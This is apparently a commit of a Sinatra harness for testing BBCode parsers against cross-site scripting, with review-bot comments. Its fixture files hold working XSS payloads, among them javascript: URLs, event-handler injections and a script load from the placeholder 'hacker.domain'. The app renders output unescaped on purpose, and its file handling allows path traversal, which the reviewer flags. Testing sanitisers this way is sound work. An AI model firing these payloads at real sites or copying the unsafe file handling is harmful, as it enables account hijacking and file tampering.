bbcode exploit tester
commit
c67e390c31
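--- /dev/null
+++ b/UNKNOWN_PATH_1
@@ -0,0 +1,7 @@
+source "http://rubygems.org"
+
+gem "sinatra"
+gem "thin"
+gem "slim"
+gem "bb-ruby"
+gem "ruby-bbcode"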
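Review bot: `source "http://rubygems.org"` on the first line fetches gems over plain HTTP, so the downloads are not integrity-protected in transit; it should be `source "https://rubygems.org"`. None of the five gems carries a version constraint and no Gemfile.lock is visible in this commit, so the versions of `bb-ruby` and `ruby-bbcode` actually exercised depend on whatever resolves at install time; pinning the two parser gems to the versions that were tested would make the results reproducible.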
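--- /dev/null
+++ b/UNKNOWN_PATH_2
@@ -0,0 +1,85 @@
+require 'sinatra'
+require 'slim'
+require 'digest/sha1'
+require 'bb-ruby'
+require 'ruby-bbcode'
+
+@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
+
+get '/' do
+@posts = list_posts
+@engines = @@engines
+slim :index
+end
+
+def show_create_page(engine)
+get "/#{engine}" do
+slim :input
+end
+end
+
+def get_post(engine)
+get "/#{engine}/:slug" do
+body = read_post params[:slug]
+@engine = 'bb-ruby'
+@slug = params[:slug]
+@other_engines = @@engines.select{|e| e != engine}
+@bbcode_output = exec_bbcode engine, body
+slim :output
+end
+end
+
+def exec_bbcode(engine, body)
+case engine
+when "bb-ruby"
+BBRuby.to_html body
+when "ruby-bbcode"
+RubyBBCode.to_html body
+when "raw"
+body
+else
+raise "unknown engine: #{engine}"
+end
+end
+
+def create_post(engine)
+post "/#{engine}" do
+slug = store_post request
+redirect to("#{engine}/#{slug}")
+end
+end
+
+def setup_dir
+begin
+Dir.mkdir "posts"
+rescue
+end
+end
+
+def slugify(title)
+title.downcase.strip.split(" ").join('-')
+end
+
+def store_post(request)
+setup_dir
+title = slugify(request["slug"])
+comment = request["comment"]
+File.write "posts/#{title}", comment
+title
+end
+
+def read_post(slug)
+file = File.open("posts/#{slug}", "r")
+file.read
+end
+
+def list_posts
+Dir.entries("posts").select{|entry| entry != '.' && entry != '..'}
+end
+
+@@engines.each do |engine|
+show_create_page engine
+get_post engine
+create_post engine
+end
+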
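Review bot: `store_post` and `read_post` build filesystem paths from request-controlled strings without validating them — `slugify` only lowercases, strips and replaces spaces, so a submitted slug containing `/` or `..` makes `File.write "posts/#{title}", comment` write outside `posts/`, and `File.open("posts/#{slug}", "r")` in `read_post` trusts the `:slug` route parameter as-is (whether the route pattern alone stops `..` or encoded separators depends on the Sinatra version and is not visible here). The rewrite below adds a whitelist check shared by both call sites and also replaces the `File.open` in `read_post`, whose handle is never closed, with `File.read`. Two smaller points: `@engine = 'bb-ruby'` in `get_post` is hard-coded, so the "try again" link in the output view always goes to `/bb-ruby` whichever engine rendered the page; it should be `@engine = engine`. The bare `rescue` in `setup_dir` swallows every StandardError rather than only an already-existing directory; `Dir.mkdir "posts" unless Dir.exist?("posts")` states the intent and drops the rescue.
```ruby
# Accept only what slugify can emit; anything else ('/', '..', encoded separators) could leave posts/.
def safe_slug(slug)
  raise ArgumentError, "invalid slug: #{slug.inspect}" unless slug.to_s.match?(/\A[a-z0-9-]+\z/)
  slug
end

def store_post(request)
  setup_dir
  title = safe_slug(slugify(request["slug"]))
  # … unchanged: comment read and File.write …
  title
end

def read_post(slug)
  # File.read closes the handle; the previous File.open without a block never did.
  File.read("posts/#{safe_slug(slug)}")
end
```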
@ -0,0 +1,2 @@
|
||||
[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]
|
||||
|
@ -0,0 +1 @@
|
||||
[color=#ff0000;font-size:100px;]XSS[/color]
|
@ -0,0 +1 @@
|
||||
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
|
@ -0,0 +1,2 @@
|
||||
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
|
||||
|
@ -0,0 +1 @@
|
||||
[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url]
|
@ -0,0 +1 @@
|
||||
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
|
@ -0,0 +1 @@
|
||||
[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube]
|
@ -0,0 +1 @@
|
||||
[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]
|
@ -0,0 +1,2 @@
|
||||
alert("This is an alert. You've been XSSed.");
|
||||
|
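--- /dev/null
+++ b/UNKNOWN_PATH_15
@@ -0,0 +1,21 @@
+doctype html
+html
+head
+title pick an engine
+body
+#content
+h1 create a sploit
+ul
+- @@engines.each do |engine|
+li
+a href="#{engine}" = engine
+#existing
+h1 list sploits
+table
+- @posts.each do |post|
+tr
+td = post
+- @@engines.each do |engine|
+td
+a href="#{engine}/#{post}" view in #{engine}
+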
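Review bot: Both loops read the class variable `@@engines` directly instead of the `@engines` instance variable the `/` route assigns, so that assignment is dead and the view depends on a top-level class variable, which Ruby 3.0 and later reject with "class variable access from toplevel"; use `- @engines.each do |engine|` in both places. Indentation is not visible in this rendering, so the nesting of the `li`/`a` and `td`/`a` lines under their loops cannot be checked here.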
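--- /dev/null
+++ b/UNKNOWN_PATH_16
@@ -0,0 +1,16 @@
+doctype html
+html
+head
+title pwn
+body
+h1 add your dope sploit
+form method='post' name='sploit'
+label for='slug' slug
+br
+input name='slug' type='text'
+br
+label for='comment' bbcode input
+br
+textarea name='comment' rows=10 cols=80
+br
+input type='submit'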
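--- /dev/null
+++ b/UNKNOWN_PATH_17
@@ -0,0 +1,13 @@
+doctype html
+html
+head
+title output
+body
+#content
+== @bbcode_output
+ul
+li
+a href="/#{@engine}" try again
+- @other_engines.each do |engine|
+li
+a href="/#{engine}/#{@slug}" view in #{engine}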
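Review bot: `== @bbcode_output` is the one line that makes this harness work — it renders the engine output unescaped, and with the `raw` engine that is the stored comment verbatim — but nothing in the template records that this is deliberate rather than an oversight, which is exactly the kind of line a later reader "fixes" to `=`. A Slim comment above it such as `/ deliberately unescaped: this view shows what each bbcode engine emits` documents the intent. The "try again" link below it depends on `@engine`, which the route currently sets to a fixed value rather than the engine that rendered the page; that is a route-side issue, noted on the Ruby file.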